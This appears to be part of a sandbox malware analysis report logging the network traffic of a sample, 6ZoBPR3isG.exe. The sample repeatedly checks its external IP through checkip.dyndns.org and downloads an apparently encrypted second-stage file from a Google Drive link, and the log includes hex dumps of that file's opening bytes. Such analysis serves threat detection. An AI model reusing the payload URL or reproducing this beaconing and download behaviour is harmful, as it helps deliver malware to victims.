                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            36192.168.2.350053132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:41.700366020 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:42.399460077 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:42 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            37192.168.2.350055132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:43.432569027 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:44.133246899 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:44 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            38192.168.2.350057132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:45.185302973 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:45.869453907 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:45 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            39192.168.2.350059132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:46.920924902 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:47.600188017 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:47 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            40192.168.2.350061132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:48.568164110 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:49.254148006 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:49 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            41192.168.2.350063132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:50.375056028 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:51.058772087 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:50 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            42192.168.2.350065132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:52.076622963 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:52.767127991 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:52 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            43192.168.2.350067132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:53.650755882 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:54.341869116 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:54 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            44192.168.2.350069132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:55.419482946 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:56.110635042 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:56 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            45192.168.2.350071132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:57.089241028 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:57.772167921 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:57 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.349957172.217.16.2064438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:31:28 UTC216OUTGET /uc?export=download&id=1C_FIUBUbXxo5lMNTlwG535Op9uD8rNbe HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                            Host: drive.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            2025-01-10 21:31:28 UTC1920INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 10 Jan 2025 21:31:28 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=1C_FIUBUbXxo5lMNTlwG535Op9uD8rNbe&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Content-Security-Policy: script-src 'nonce-hTcF9SwfOrwPq2LydgSNeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.349963172.217.16.1294438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:31:29 UTC258OUTGET /download?id=1C_FIUBUbXxo5lMNTlwG535Op9uD8rNbe&export=download HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:31:32 UTC4933INHTTP/1.1 200 OK
                                                                                                            X-GUploader-UploadID: AFIdbgTGORc0elWXKawzseyMC3lJRrJ0vrfWbJx57mILCzItJiA4EU04iYGQZkvZyN31QI1n
                                                                                                            Content-Type: application/octet-stream
                                                                                                            Content-Security-Policy: sandbox
                                                                                                            Content-Security-Policy: default-src 'none'
                                                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                                                            X-Content-Security-Policy: sandbox
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                                            Cross-Origin-Resource-Policy: same-site
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Content-Disposition: attachment; filename="OcNNsWBsZVg92.bin"
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Credentials: false
                                                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                            Accept-Ranges: bytes
                                                                                                            Content-Length: 94272
                                                                                                            Last-Modified: Tue, 10 Dec 2024 07:01:29 GMT
                                                                                                            Date: Fri, 10 Jan 2025 21:31:32 GMT
                                                                                                            Expires: Fri, 10 Jan 2025 21:31:32 GMT
                                                                                                            Cache-Control: private, max-age=0
                                                                                                            X-Goog-Hash: crc32c=ZH8YRg==
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close
                                                                                                            2025-01-10 21:31:32 UTC4933INData Raw: a9 6e f3 92 ec 42 7d d6 7c bd 3b 68 61 e9 36 6e f0 ea 39 85 b2 4b 07 a3 8e 80 6a 96 d9 22 fb fe 32 6a ad a3 9f 83 ba fe 02 23 2e 8c f4 42 7a 3b 43 42 0e 0a c1 77 17 94 a3 47 b0 55 4c 02 f2 5c 39 4e 7d 2f 0f b5 64 84 02 4e d7 2c 1f c3 c4 42 02 05 1a ab fc f0 ae 2b 6b d9 1f 9a 5f 83 d6 8a 14 f7 b3 a9 fb 14 79 db ba 2b 8d da 2e 4b 43 4b a2 7d 88 83 76 23 37 41 9a 2b b6 0b cc 33 30 84 26 8e 63 3b 08 bb 76 4f d0 5a d7 c4 f8 d4 0f 0d 51 3f b3 1b 08 bd 0e 48 91 8a 0d 1f 7a ed 29 e2 c4 5e 44 5c de 8e cb b9 78 37 e8 0a 19 24 68 8c 05 c7 4d 06 8d 53 38 f3 c7 13 15 ef 40 3c a3 49 12 22 c0 8f 74 a8 a9 c5 3a f9 a1 b4 32 3a 5d 77 cb 40 a5 1a 11 e0 9a a0 03 e0 50 65 8f a6 fa ef 77 2d 5a fb b1 37 f3 d0 ba f0 e9 b8 3d 5a 14 a9 a5 9e 3e cc 3e 50 68 25 0d a1 82 91 0f a7 f6
                                                                                                            Data Ascii: nB}|;ha6n9Kj"2j#.Bz;CBwGUL\9N}/dN,B+k_y+.KCK}v#7A+30&c;vOZQ?Hz)^D\x7$hMS8@<I"t:2:]w@Pew-Z7=Z>>Ph%
                                                                                                            2025-01-10 21:31:32 UTC4833INData Raw: b6 c0 83 4e ec fc d8 06 20 06 e6 43 7c ac b9 ee d0 60 ce 27 d9 64 ef 1f 12 7c 4e 23 1e 8a 04 29 1c a5 87 5c fb 6c 19 39 1f 8a c9 2a cb b9 d6 c1 a5 32 97 85 e1 b4 be 41 1c 73 44 62 be f1 1b c1 c6 aa aa 4e 25 e7 29 8f ad a2 14 b3 d7 77 ab 96 1f 4c 2e 67 0d f9 ec e2 75 2f f7 68 b1 9e ce 86 c9 64 a6 f1 9c 5d 15 8c 59 57 5c 2a 90 b7 40 36 51 27 d9 64 77 4d 16 73 50 e7 cb 14 4e 83 29 4a 1a 13 d3 13 09 61 7c a2 12 2b 5d 7a 1f d2 f4 f0 96 e1 c7 31 c1 12 b6 f2 7f 45 4d 63 17 0a 10 cd 66 6a ae 15 22 5e 72 8d fe 3c 28 b5 34 1f c0 dc 4f 91 42 2c 66 2e 08 83 6b 91 2e 8f c3 e3 54 89 e7 22 a9 b9 14 17 d7 2e f9 75 eb c0 c9 b9 07 eb 72 16 18 38 89 ed 39 8d f7 12 de 80 56 fa 4d 24 5f 2a 26 79 db 23 d3 36 3c 41 a7 88 d2 06 c2 33 6e 63 46 bd 87 f6 a9 ab 81 4e 18 93 3b 55 67
                                                                                                            Data Ascii: N C|`'d|N#)\l9*2AsDbN%)wL.gu/hd]YW\*@6Q'dwMsPN)Ja|+]z1EMcfj"^r<(4OB,f.k.T".ur89VM$_*&y#6<A3ncFN;Ug
                                                                                                            2025-01-10 21:31:32 UTC1322INData Raw: 74 5a c4 e3 2e 8a b0 22 a9 b9 63 93 de 55 c3 5d ac c4 cb c8 23 78 72 12 3a ea f7 ff 33 8d f1 64 c4 e9 2b bd 5e 23 4a 2e 4b 97 96 23 d9 23 13 ff 31 88 d8 71 8e 4d 4e 67 46 b9 de 61 a9 ab 98 6d 12 ed ba 55 67 84 73 35 32 10 55 fc d0 11 7d 13 f7 b5 85 fb d8 47 04 39 30 46 64 cd 1f 4e 23 11 22 df 04 8a c2 c8 eb 6b da b8 c7 6b 4f e6 d1 26 d0 d0 88 82 e0 d9 48 63 37 dd 89 da cb d3 50 e2 66 f4 68 07 bd 5e 7f 4c 02 1e a1 cb 64 d1 4a bc 61 f2 b3 23 be e3 23 c9 1e 79 95 05 e2 2f f6 23 de 42 17 25 af 75 f0 68 89 43 53 0c 15 e4 91 af 7d bf c7 16 86 fc 6d 99 5e ad 35 ff 1c 87 32 c9 c7 78 45 d3 14 7c 1d b7 83 76 02 20 86 1c e2 09 71 ae f2 8b 73 58 df b4 48 58 16 a7 ca c7 67 b1 2e bb 80 af 22 a1 fb f2 c0 59 a5 bd 3e c8 34 8a 39 0c 8b dd 24 8a cc da f3 99 5b 50 23 e3 bd
                                                                                                            Data Ascii: tZ."cU]#xr:3d+^#J.K##1qMNgFamUgs52U}G90FdN#"kkO&Hc7Pfh^LdJa##y/#B%uhCS}m^52xE|v qsXHXg."Y>49$[P#
                                                                                                            2025-01-10 21:31:32 UTC1390INData Raw: f2 0d 3d 7f ad 97 91 7f 07 d3 e0 0a ca 98 a7 b7 10 16 bb ba 53 1a 3d 33 ff f9 03 bd 0e 56 c2 cd fb 9c 70 3e 4b 41 e2 d1 3c c6 68 ab ee eb 93 5b 15 24 72 e4 4a 74 be a0 64 91 41 44 27 d3 ee e0 16 7d 0e 4e 31 16 a2 a7 3b 1c af 90 71 61 69 34 a2 c1 5b d7 28 3c 83 dd c8 ca 28 f8 84 eb b4 68 9f d3 56 47 53 be f1 3b d3 d2 aa 82 1e 25 fa 23 28 2d a0 1b b3 d7 77 ab f3 37 46 2e 29 7c af e7 ce 05 39 ce e9 c2 47 c4 90 3d 6e af 79 b2 58 2c 96 7d 41 2e e0 f6 3b 30 94 7e 23 ad 93 64 33 78 d1 75 fb ca 9b 58 83 53 87 b1 0a a1 07 1f 70 0a 6f 91 3f 4e 74 7b 7e 65 f0 92 8f 72 27 bf c6 b6 e3 73 1f e6 75 17 70 0d 62 6d 6a d4 9f 31 49 0c 55 91 01 22 c7 d3 21 87 ac 20 44 2d be 6c 8c 27 9b 04 49 5c 8b ce 91 c0 e0 fa 52 c6 62 66 85 d6 8c ac 44 d2 1e c9 b3 62 0a e5 0e 12 48 98 20
                                                                                                            Data Ascii: =S=3Vp>KA<h[$rJtdAD'}N1;qai4[(<(hVGS;%#(-w7F.)|9G=nyX,}A.;0~#d3xuXSpo?Nt{~er'supbmj1IU"! D-l'I\RbfDbH
                                                                                                            2025-01-10 21:31:32 UTC1390INData Raw: 47 29 2b d9 0e 96 4e 8e 4c 99 1a e6 bd da 15 14 79 d1 a9 24 9c d4 3f 45 31 1b b8 7d f8 ec 9d 23 37 4b 8d fd d9 e4 4c 33 3a 97 38 80 d7 47 5c 15 7f f2 d9 ac d6 88 3f e6 4a 74 29 55 e0 9b 7a d2 63 29 e2 f6 3f 13 ea 83 47 87 07 6d 35 28 ed eb 64 c0 8e d3 df 2a 5d 6a 28 b8 7e bb 3c 11 41 5b 35 89 f0 05 04 fd 51 28 b5 58 51 08 32 8f 38 a3 8c d4 99 d5 45 25 e2 3a 5d 77 35 41 b6 0d e0 f7 8b b8 19 f8 2c 63 99 d3 e3 ef 5c 20 5a ec a2 2f f3 c1 77 62 32 ab 27 6c 07 b2 9d 08 3d cc 3e 41 3c 34 16 10 9d b1 3e b2 e7 ed 12 be cd b8 c8 39 ba 8f b4 30 47 b9 2c b2 a5 27 b0 f9 38 2f cc ed 89 ce 0a 4b 20 9f d5 21 8f 33 82 4e eb 82 47 15 3e 1d ff 5b 6f 2b 99 a4 b9 0f 4e 34 c6 7f f1 04 62 22 8b 23 14 80 52 75 1c a5 89 67 66 1e fb 36 1f 24 d6 0a d3 83 a3 4a d0 33 e7 ea 18 b4 62
                                                                                                            Data Ascii: G)+NLy$?E1}#7KL3:8G\?Jt)Uzc)?Gm5(d*]j(~<A[5Q(XQ28E%:]w5A,c\ Z/wb2'l=>A<4>90G,'8/K !3NG>[o+N4b"#Rugf6$J3b
                                                                                                            2025-01-10 21:31:32 UTC1390INData Raw: c9 f8 9a bc d5 25 26 d2 f4 69 2a fd 11 07 07 bd a9 e6 f1 d0 1f db db 75 68 cf 68 e9 30 a3 a1 1f b3 0d e3 8a d6 5b 5f 1d cb 71 35 9c dd fa 1f a8 9b ff 8b 8a 6f 9f f7 9a e4 22 5a 40 61 36 3d 07 7e fc 81 40 21 79 33 2c 28 65 dd b6 07 d9 b3 9c f7 04 81 12 0b 1f d0 8b 5d 09 e8 a7 74 47 1d 9a 40 2e 2f 92 56 0c 3e d2 9a 8a d8 69 75 5e 27 73 f6 a2 cb 9b f4 b8 9c a3 b4 f6 61 36 34 b9 b3 ed 08 fc 53 43 a5 d0 86 07 b3 78 05 e1 03 15 a4 6e eb f8 4e d7 26 f7 53 3b 42 ba 0f 75 ab fd f0 a4 03 41 d9 1f 90 53 83 d6 8a 05 ff dc 29 fb 14 73 c8 b7 3a 80 f7 9e 95 54 5a aa 08 99 83 76 22 1b 4c 8b 23 c3 1a 4c 33 31 eb 29 91 d9 3f 08 d3 77 0c 98 f9 0c 9f ef e2 8d e8 61 4c 93 6a 69 d5 61 21 e1 e0 3b 74 95 ea 5c 57 98 18 26 39 f4 fc be c6 5f 4a 90 02 ba 6b 3b a6 7b ac f7 43 86 76
